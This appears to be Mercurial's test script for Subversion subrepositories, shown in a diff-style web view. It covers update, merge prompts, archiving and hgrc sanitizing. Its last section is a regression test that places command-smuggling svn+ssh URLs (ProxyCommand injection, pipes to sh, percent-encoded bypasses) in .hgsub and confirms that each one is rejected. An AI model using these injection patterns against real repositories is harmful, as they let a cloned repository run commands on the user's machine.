238 update to nullrev (must delete the subrepo)
238 update to nullrev (must delete the subrepo)
239
239
240 $ hg up null
240 $ hg up null
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
242 $ ls
242 $ ls
243
243
244 Check hg update --clean
244 Check hg update --clean
245 $ cd "$TESTTMP/sub/t"
245 $ cd "$TESTTMP/sub/t"
246 $ cd s
246 $ cd s
247 $ echo c0 > alpha
247 $ echo c0 > alpha
248 $ echo c1 > f1
248 $ echo c1 > f1
249 $ echo c1 > f2
249 $ echo c1 > f2
250 $ svn add f1 -q
250 $ svn add f1 -q
251 $ svn status | sort
251 $ svn status | sort
252
252
253 ? * a (glob)
253 ? * a (glob)
254 ? * f2 (glob)
254 ? * f2 (glob)
255 A * f1 (glob)
255 A * f1 (glob)
256 M * alpha (glob)
256 M * alpha (glob)
257 Performing status on external item at 'externals'* (glob)
257 Performing status on external item at 'externals'* (glob)
258 X * externals (glob)
258 X * externals (glob)
259 $ cd ../..
259 $ cd ../..
260 $ hg -R t update -C
260 $ hg -R t update -C
261
261
262 Fetching external item into 't/s/externals'* (glob)
262 Fetching external item into 't/s/externals'* (glob)
263 Checked out external at revision 1.
263 Checked out external at revision 1.
264
264
265 Checked out revision 3.
265 Checked out revision 3.
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
267 $ cd t/s
267 $ cd t/s
268 $ svn status | sort
268 $ svn status | sort
269
269
270 ? * a (glob)
270 ? * a (glob)
271 ? * f1 (glob)
271 ? * f1 (glob)
272 ? * f2 (glob)
272 ? * f2 (glob)
273 Performing status on external item at 'externals'* (glob)
273 Performing status on external item at 'externals'* (glob)
274 X * externals (glob)
274 X * externals (glob)
275
275
276 Sticky subrepositories, no changes
276 Sticky subrepositories, no changes
277 $ cd "$TESTTMP/sub/t"
277 $ cd "$TESTTMP/sub/t"
278 $ hg id -n
278 $ hg id -n
279 2
279 2
280 $ cd s
280 $ cd s
281 $ svnversion
281 $ svnversion
282 3
282 3
283 $ cd ..
283 $ cd ..
284 $ hg update 1
284 $ hg update 1
285 U *s/alpha (glob)
285 U *s/alpha (glob)
286
286
287 Fetching external item into '*s/externals'* (glob)
287 Fetching external item into '*s/externals'* (glob)
288 Checked out external at revision 1.
288 Checked out external at revision 1.
289
289
290 Checked out revision 2.
290 Checked out revision 2.
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
292 $ hg id -n
292 $ hg id -n
293 1
293 1
294 $ cd s
294 $ cd s
295 $ svnversion
295 $ svnversion
296 2
296 2
297 $ cd ..
297 $ cd ..
298
298
299 Sticky subrepositories, file changes
299 Sticky subrepositories, file changes
300 $ touch s/f1
300 $ touch s/f1
301 $ cd s
301 $ cd s
302 $ svn add f1
302 $ svn add f1
303 A f1
303 A f1
304 $ cd ..
304 $ cd ..
305 $ hg id -n
305 $ hg id -n
306 1+
306 1+
307 $ cd s
307 $ cd s
308 $ svnversion
308 $ svnversion
309 2M
309 2M
310 $ cd ..
310 $ cd ..
311 $ hg update tip
311 $ hg update tip
312 subrepository s diverged (local revision: 2, remote revision: 3)
312 subrepository s diverged (local revision: 2, remote revision: 3)
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
314 subrepository sources for s differ
314 subrepository sources for s differ
315 use (l)ocal source (2) or (r)emote source (3)? l
315 use (l)ocal source (2) or (r)emote source (3)? l
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 $ hg id -n
317 $ hg id -n
318 2+
318 2+
319 $ cd s
319 $ cd s
320 $ svnversion
320 $ svnversion
321 2M
321 2M
322 $ cd ..
322 $ cd ..
323 $ hg update --clean tip
323 $ hg update --clean tip
324 U *s/alpha (glob)
324 U *s/alpha (glob)
325
325
326 Fetching external item into '*s/externals'* (glob)
326 Fetching external item into '*s/externals'* (glob)
327 Checked out external at revision 1.
327 Checked out external at revision 1.
328
328
329 Checked out revision 3.
329 Checked out revision 3.
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
331
331
332 Sticky subrepository, revision updates
332 Sticky subrepository, revision updates
333 $ hg id -n
333 $ hg id -n
334 2
334 2
335 $ cd s
335 $ cd s
336 $ svnversion
336 $ svnversion
337 3
337 3
338 $ cd ..
338 $ cd ..
339 $ cd s
339 $ cd s
340 $ svn update -qr 1
340 $ svn update -qr 1
341 $ cd ..
341 $ cd ..
342 $ hg update 1
342 $ hg update 1
343 subrepository s diverged (local revision: 3, remote revision: 2)
343 subrepository s diverged (local revision: 3, remote revision: 2)
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
345 subrepository sources for s differ (in checked out version)
345 subrepository sources for s differ (in checked out version)
346 use (l)ocal source (1) or (r)emote source (2)? l
346 use (l)ocal source (1) or (r)emote source (2)? l
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
348 $ hg id -n
348 $ hg id -n
349 1+
349 1+
350 $ cd s
350 $ cd s
351 $ svnversion
351 $ svnversion
352 1
352 1
353 $ cd ..
353 $ cd ..
354
354
355 Sticky subrepository, file changes and revision updates
355 Sticky subrepository, file changes and revision updates
356 $ touch s/f1
356 $ touch s/f1
357 $ cd s
357 $ cd s
358 $ svn add f1
358 $ svn add f1
359 A f1
359 A f1
360 $ svnversion
360 $ svnversion
361 1M
361 1M
362 $ cd ..
362 $ cd ..
363 $ hg id -n
363 $ hg id -n
364 1+
364 1+
365 $ hg update tip
365 $ hg update tip
366 subrepository s diverged (local revision: 3, remote revision: 3)
366 subrepository s diverged (local revision: 3, remote revision: 3)
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
368 subrepository sources for s differ
368 subrepository sources for s differ
369 use (l)ocal source (1) or (r)emote source (3)? l
369 use (l)ocal source (1) or (r)emote source (3)? l
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
371 $ hg id -n
371 $ hg id -n
372 2+
372 2+
373 $ cd s
373 $ cd s
374 $ svnversion
374 $ svnversion
375 1M
375 1M
376 $ cd ..
376 $ cd ..
377
377
378 Sticky repository, update --clean
378 Sticky repository, update --clean
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
380 U *s/alpha (glob)
380 U *s/alpha (glob)
381 U *s (glob)
381 U *s (glob)
382
382
383 Fetching external item into '*s/externals'* (glob)
383 Fetching external item into '*s/externals'* (glob)
384 Checked out external at revision 1.
384 Checked out external at revision 1.
385
385
386 Checked out revision 3.
386 Checked out revision 3.
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
388 $ hg id -n
388 $ hg id -n
389 2
389 2
390 $ cd s
390 $ cd s
391 $ svnversion
391 $ svnversion
392 3
392 3
393 $ cd ..
393 $ cd ..
394
394
395 Test subrepo already at intended revision:
395 Test subrepo already at intended revision:
396 $ cd s
396 $ cd s
397 $ svn update -qr 2
397 $ svn update -qr 2
398 $ cd ..
398 $ cd ..
399 $ hg update 1
399 $ hg update 1
400 subrepository s diverged (local revision: 3, remote revision: 2)
400 subrepository s diverged (local revision: 3, remote revision: 2)
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
401 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
402 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
403 $ hg id -n
403 $ hg id -n
404 1+
404 1+
405 $ cd s
405 $ cd s
406 $ svnversion
406 $ svnversion
407 2
407 2
408 $ cd ..
408 $ cd ..
409
409
410 Test case where subversion would fail to update the subrepo because there
410 Test case where subversion would fail to update the subrepo because there
411 are unknown directories being replaced by tracked ones (happens with rebase).
411 are unknown directories being replaced by tracked ones (happens with rebase).
412
412
413 $ cd "$WCROOT/src"
413 $ cd "$WCROOT/src"
414 $ mkdir dir
414 $ mkdir dir
415 $ echo epsilon.py > dir/epsilon.py
415 $ echo epsilon.py > dir/epsilon.py
416 $ svn add dir
416 $ svn add dir
417 A dir
417 A dir
418 A dir/epsilon.py (glob)
418 A dir/epsilon.py (glob)
419 $ svn ci -qm 'Add dir/epsilon.py'
419 $ svn ci -qm 'Add dir/epsilon.py'
420 $ cd ../..
420 $ cd ../..
421 $ hg init rebaserepo
421 $ hg init rebaserepo
422 $ cd rebaserepo
422 $ cd rebaserepo
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
423 $ svn co -r5 --quiet "$SVNREPOURL"/src s
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
424 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
425 $ hg add .hgsub
425 $ hg add .hgsub
426 $ hg ci -m addsub
426 $ hg ci -m addsub
427 $ echo a > a
427 $ echo a > a
428 $ hg add .
428 $ hg add .
429 adding a
429 adding a
430 $ hg ci -m adda
430 $ hg ci -m adda
431 $ hg up 0
431 $ hg up 0
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
432 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
433 $ svn up -qr6 s
433 $ svn up -qr6 s
434 $ hg ci -m updatesub
434 $ hg ci -m updatesub
435 created new head
435 created new head
436 $ echo pyc > s/dir/epsilon.pyc
436 $ echo pyc > s/dir/epsilon.pyc
437 $ hg up 1
437 $ hg up 1
438 D *s/dir (glob)
438 D *s/dir (glob)
439
439
440 Fetching external item into '*s/externals'* (glob)
440 Fetching external item into '*s/externals'* (glob)
441 Checked out external at revision 1.
441 Checked out external at revision 1.
442
442
443 Checked out revision 5.
443 Checked out revision 5.
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
444 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
445 $ hg up -q 2
445 $ hg up -q 2
446
446
447 Modify one of the externals to point to a different path so we can
447 Modify one of the externals to point to a different path so we can
448 test having obstructions when switching branches on checkout:
448 test having obstructions when switching branches on checkout:
449 $ hg checkout tip
449 $ hg checkout tip
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
450 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
451 $ echo "obstruct = [svn] $SVNREPOURL/externals" >> .hgsub
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
452 $ svn co -r5 --quiet "$SVNREPOURL"/externals obstruct
453 $ hg commit -m 'Start making obstructed working copy'
453 $ hg commit -m 'Start making obstructed working copy'
454 $ hg book other
454 $ hg book other
455 $ hg co -r 'p1(tip)'
455 $ hg co -r 'p1(tip)'
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
456 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
457 (leaving bookmark other)
457 (leaving bookmark other)
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
458 $ echo "obstruct = [svn] $SVNREPOURL/src" >> .hgsub
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
459 $ svn co -r5 --quiet "$SVNREPOURL"/src obstruct
460 $ hg commit -m 'Other branch which will be obstructed'
460 $ hg commit -m 'Other branch which will be obstructed'
461 created new head
461 created new head
462
462
463 Switching back to the head where we have another path mapped to the
463 Switching back to the head where we have another path mapped to the
464 same subrepo should work if the subrepo is clean.
464 same subrepo should work if the subrepo is clean.
465 $ hg co other
465 $ hg co other
466 A *obstruct/other (glob)
466 A *obstruct/other (glob)
467 Checked out revision 1.
467 Checked out revision 1.
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
468 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
469 (activating bookmark other)
469 (activating bookmark other)
470
470
471 This is surprising, but is also correct based on the current code:
471 This is surprising, but is also correct based on the current code:
472 $ echo "updating should (maybe) fail" > obstruct/other
472 $ echo "updating should (maybe) fail" > obstruct/other
473 $ hg co tip
473 $ hg co tip
474 abort: uncommitted changes
474 abort: uncommitted changes
475 (commit or update --clean to discard changes)
475 (commit or update --clean to discard changes)
476 [255]
476 [255]
477
477
478 Point to a Subversion branch which has since been deleted and recreated
478 Point to a Subversion branch which has since been deleted and recreated
479 First, create that condition in the repository.
479 First, create that condition in the repository.
480
480
481 $ hg ci --subrepos -m cleanup | filter_svn_output
481 $ hg ci --subrepos -m cleanup | filter_svn_output
482 committing subrepository obstruct
482 committing subrepository obstruct
483 Sending obstruct/other (glob)
483 Sending obstruct/other (glob)
484 Committed revision 7.
484 Committed revision 7.
485 At revision 7.
485 At revision 7.
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
486 $ svn mkdir -qm "baseline" $SVNREPOURL/trunk
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
487 $ svn copy -qm "initial branch" $SVNREPOURL/trunk $SVNREPOURL/branch
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
488 $ svn co --quiet "$SVNREPOURL"/branch tempwc
489 $ cd tempwc
489 $ cd tempwc
490 $ echo "something old" > somethingold
490 $ echo "something old" > somethingold
491 $ svn add somethingold
491 $ svn add somethingold
492 A somethingold
492 A somethingold
493 $ svn ci -qm 'Something old'
493 $ svn ci -qm 'Something old'
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
494 $ svn rm -qm "remove branch" $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
495 $ svn copy -qm "recreate branch" $SVNREPOURL/trunk $SVNREPOURL/branch
496 $ svn up -q
496 $ svn up -q
497 $ echo "something new" > somethingnew
497 $ echo "something new" > somethingnew
498 $ svn add somethingnew
498 $ svn add somethingnew
499 A somethingnew
499 A somethingnew
500 $ svn ci -qm 'Something new'
500 $ svn ci -qm 'Something new'
501 $ cd ..
501 $ cd ..
502 $ rm -rf tempwc
502 $ rm -rf tempwc
503 $ svn co "$SVNREPOURL/branch"@10 recreated
503 $ svn co "$SVNREPOURL/branch"@10 recreated
504 A recreated/somethingold (glob)
504 A recreated/somethingold (glob)
505 Checked out revision 10.
505 Checked out revision 10.
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
506 $ echo "recreated = [svn] $SVNREPOURL/branch" >> .hgsub
507 $ hg ci -m addsub
507 $ hg ci -m addsub
508 $ cd recreated
508 $ cd recreated
509 $ svn up -q
509 $ svn up -q
510 $ cd ..
510 $ cd ..
511 $ hg ci -m updatesub
511 $ hg ci -m updatesub
512 $ hg up -r-2
512 $ hg up -r-2
513 D *recreated/somethingnew (glob)
513 D *recreated/somethingnew (glob)
514 A *recreated/somethingold (glob)
514 A *recreated/somethingold (glob)
515 Checked out revision 10.
515 Checked out revision 10.
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
516 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
517 (leaving bookmark other)
517 (leaving bookmark other)
518 $ test -f recreated/somethingold
518 $ test -f recreated/somethingold
519
519
520 Test archive
520 Test archive
521
521
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
522 $ hg archive -S ../archive-all --debug --config progress.debug=true
523 archiving: 0/2 files (0.00%)
523 archiving: 0/2 files (0.00%)
524 archiving: .hgsub 1/2 files (50.00%)
524 archiving: .hgsub 1/2 files (50.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
525 archiving: .hgsubstate 2/2 files (100.00%)
526 archiving (obstruct): 0/1 files (0.00%)
526 archiving (obstruct): 0/1 files (0.00%)
527 archiving (obstruct): 1/1 files (100.00%)
527 archiving (obstruct): 1/1 files (100.00%)
528 archiving (recreated): 0/1 files (0.00%)
528 archiving (recreated): 0/1 files (0.00%)
529 archiving (recreated): 1/1 files (100.00%)
529 archiving (recreated): 1/1 files (100.00%)
530 archiving (s): 0/2 files (0.00%)
530 archiving (s): 0/2 files (0.00%)
531 archiving (s): 1/2 files (50.00%)
531 archiving (s): 1/2 files (50.00%)
532 archiving (s): 2/2 files (100.00%)
532 archiving (s): 2/2 files (100.00%)
533
533
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
534 $ hg archive -S ../archive-exclude --debug --config progress.debug=true -X **old
535 archiving: 0/2 files (0.00%)
535 archiving: 0/2 files (0.00%)
536 archiving: .hgsub 1/2 files (50.00%)
536 archiving: .hgsub 1/2 files (50.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
537 archiving: .hgsubstate 2/2 files (100.00%)
538 archiving (obstruct): 0/1 files (0.00%)
538 archiving (obstruct): 0/1 files (0.00%)
539 archiving (obstruct): 1/1 files (100.00%)
539 archiving (obstruct): 1/1 files (100.00%)
540 archiving (recreated): 0 files
540 archiving (recreated): 0 files
541 archiving (s): 0/2 files (0.00%)
541 archiving (s): 0/2 files (0.00%)
542 archiving (s): 1/2 files (50.00%)
542 archiving (s): 1/2 files (50.00%)
543 archiving (s): 2/2 files (100.00%)
543 archiving (s): 2/2 files (100.00%)
544 $ find ../archive-exclude | sort
544 $ find ../archive-exclude | sort
545 ../archive-exclude
545 ../archive-exclude
546 ../archive-exclude/.hg_archival.txt
546 ../archive-exclude/.hg_archival.txt
547 ../archive-exclude/.hgsub
547 ../archive-exclude/.hgsub
548 ../archive-exclude/.hgsubstate
548 ../archive-exclude/.hgsubstate
549 ../archive-exclude/obstruct
549 ../archive-exclude/obstruct
550 ../archive-exclude/obstruct/other
550 ../archive-exclude/obstruct/other
551 ../archive-exclude/s
551 ../archive-exclude/s
552 ../archive-exclude/s/alpha
552 ../archive-exclude/s/alpha
553 ../archive-exclude/s/dir
553 ../archive-exclude/s/dir
554 ../archive-exclude/s/dir/epsilon.py
554 ../archive-exclude/s/dir/epsilon.py
555
555
556 Test forgetting files, not implemented in svn subrepo, used to
556 Test forgetting files, not implemented in svn subrepo, used to
557 traceback
557 traceback
558
558
559 #if no-windows
559 #if no-windows
560 $ hg forget 'notafile*'
560 $ hg forget 'notafile*'
561 notafile*: No such file or directory
561 notafile*: No such file or directory
562 [1]
562 [1]
563 #else
563 #else
564 $ hg forget 'notafile'
564 $ hg forget 'notafile'
565 notafile: * (glob)
565 notafile: * (glob)
566 [1]
566 [1]
567 #endif
567 #endif
568
568
569 Test a subrepo referencing a just moved svn path. Last commit rev will
569 Test a subrepo referencing a just moved svn path. Last commit rev will
570 be different from the revision, and the path will be different as
570 be different from the revision, and the path will be different as
571 well.
571 well.
572
572
573 $ cd "$WCROOT"
573 $ cd "$WCROOT"
574 $ svn up > /dev/null
574 $ svn up > /dev/null
575 $ mkdir trunk/subdir branches
575 $ mkdir trunk/subdir branches
576 $ echo a > trunk/subdir/a
576 $ echo a > trunk/subdir/a
577 $ svn add trunk/subdir branches
577 $ svn add trunk/subdir branches
578 A trunk/subdir (glob)
578 A trunk/subdir (glob)
579 A trunk/subdir/a (glob)
579 A trunk/subdir/a (glob)
580 A branches
580 A branches
581 $ svn ci -qm addsubdir
581 $ svn ci -qm addsubdir
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
582 $ svn cp -qm branchtrunk $SVNREPOURL/trunk $SVNREPOURL/branches/somebranch
583 $ cd ..
583 $ cd ..
584
584
585 $ hg init repo2
585 $ hg init repo2
586 $ cd repo2
586 $ cd repo2
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
587 $ svn co $SVNREPOURL/branches/somebranch/subdir
588 A subdir/a (glob)
588 A subdir/a (glob)
589 Checked out revision 15.
589 Checked out revision 15.
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
590 $ echo "subdir = [svn] $SVNREPOURL/branches/somebranch/subdir" > .hgsub
591 $ hg add .hgsub
591 $ hg add .hgsub
592 $ hg ci -m addsub
592 $ hg ci -m addsub
593 $ hg up null
593 $ hg up null
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
594 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
595 $ hg up
595 $ hg up
596 A *subdir/a (glob)
596 A *subdir/a (glob)
597 Checked out revision 15.
597 Checked out revision 15.
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
598 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
599 $ cd ..
599 $ cd ..
600
600
601 Test sanitizing ".hg/hgrc" in subrepo
601 Test sanitizing ".hg/hgrc" in subrepo
602
602
603 $ cd sub/t
603 $ cd sub/t
604 $ hg update -q -C tip
604 $ hg update -q -C tip
605 $ cd s
605 $ cd s
606 $ mkdir .hg
606 $ mkdir .hg
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
607 $ echo '.hg/hgrc in svn repo' > .hg/hgrc
608 $ mkdir -p sub/.hg
608 $ mkdir -p sub/.hg
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
609 $ echo 'sub/.hg/hgrc in svn repo' > sub/.hg/hgrc
610 $ svn add .hg sub
610 $ svn add .hg sub
611 A .hg
611 A .hg
612 A .hg/hgrc (glob)
612 A .hg/hgrc (glob)
613 A sub
613 A sub
614 A sub/.hg (glob)
614 A sub/.hg (glob)
615 A sub/.hg/hgrc (glob)
615 A sub/.hg/hgrc (glob)
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
616 $ svn ci -qm 'add .hg/hgrc to be sanitized at hg update'
617 $ svn up -q
617 $ svn up -q
618 $ cd ..
618 $ cd ..
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
619 $ hg commit -S -m 'commit with svn revision including .hg/hgrc'
620 $ grep ' s$' .hgsubstate
620 $ grep ' s$' .hgsubstate
621 16 s
621 16 s
622 $ cd ..
622 $ cd ..
623
623
624 $ hg -R tc pull -u -q 2>&1 | sort
624 $ hg -R tc pull -u -q 2>&1 | sort
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
625 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
626 warning: removing potentially hostile 'hgrc' in '$TESTTMP/sub/tc/s/sub/.hg' (glob)
627 $ cd tc
627 $ cd tc
628 $ grep ' s$' .hgsubstate
628 $ grep ' s$' .hgsubstate
629 16 s
629 16 s
630 $ test -f s/.hg/hgrc
630 $ test -f s/.hg/hgrc
631 [1]
631 [1]
632 $ test -f s/sub/.hg/hgrc
632 $ test -f s/sub/.hg/hgrc
633 [1]
633 [1]
634
634
635 Test that sanitizing is omitted in meta data area:
635 Test that sanitizing is omitted in meta data area:
636
636
637 $ mkdir s/.svn/.hg
637 $ mkdir s/.svn/.hg
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
638 $ echo '.hg/hgrc in svn metadata area' > s/.svn/.hg/hgrc
639 $ hg update -q -C '.^1'
639 $ hg update -q -C '.^1'
640
640
641 $ cd ../..
641 $ cd ../..
642
643 SEC: test for ssh exploit
644
645 $ hg init ssh-vuln
646 $ cd ssh-vuln
647 $ echo "s = [svn]$SVNREPOURL/src" >> .hgsub
648 $ svn co --quiet "$SVNREPOURL"/src s
649 $ hg add .hgsub
650 $ hg ci -m1
651 $ echo "s = [svn]svn+ssh://-oProxyCommand=touch%20owned%20nested" > .hgsub
652 $ hg ci -m2
653 $ cd ..
654 $ hg clone ssh-vuln ssh-vuln-clone
655 updating to branch default
656 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
657 [255]
658
Also check that a percent-encoded '-' (%2D) doesn't bypass the check
660
661 $ cd ssh-vuln
662 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20nested" > .hgsub
663 $ hg ci -m3
664 $ cd ..
665 $ rm -r ssh-vuln-clone
666 $ hg clone ssh-vuln ssh-vuln-clone
667 updating to branch default
668 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned nested' (in subrepository "s")
669 [255]
670
Also check that a pipe character in the host doesn't work
672
673 $ cd ssh-vuln
674 $ echo "s = [svn]svn+ssh://fakehost|sh%20nested" > .hgsub
675 $ hg ci -m3
676 $ cd ..
677 $ rm -r ssh-vuln-clone
678 $ hg clone ssh-vuln ssh-vuln-clone
679 updating to branch default
680 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepository "s")
681 [255]
682
Also check that a percent-encoded '|' (%7C) doesn't bypass the check
684
685 $ cd ssh-vuln
686 $ echo "s = [svn]svn+ssh://fakehost%7Csh%20nested" > .hgsub
687 $ hg ci -m3
688 $ cd ..
689 $ rm -r ssh-vuln-clone
690 $ hg clone ssh-vuln ssh-vuln-clone
691 updating to branch default
692 abort: potentially unsafe url: 'svn+ssh://fakehost|sh nested' (in subrepository "s")
693 [255]
694
Also check that hiding the attack in the username part of the URL doesn't work:
696
697 $ cd ssh-vuln
698 $ echo "s = [svn]svn+ssh://%2DoProxyCommand=touch%20owned%20foo@example.com/nested" > .hgsub
699 $ hg ci -m3
700 $ cd ..
701 $ rm -r ssh-vuln-clone
702 $ hg clone ssh-vuln ssh-vuln-clone
703 updating to branch default
704 abort: potentially unsafe url: 'svn+ssh://-oProxyCommand=touch owned foo@example.com/nested' (in subrepository "s")
705 [255]
General Comments 0
You need to be logged in to leave comments. Login now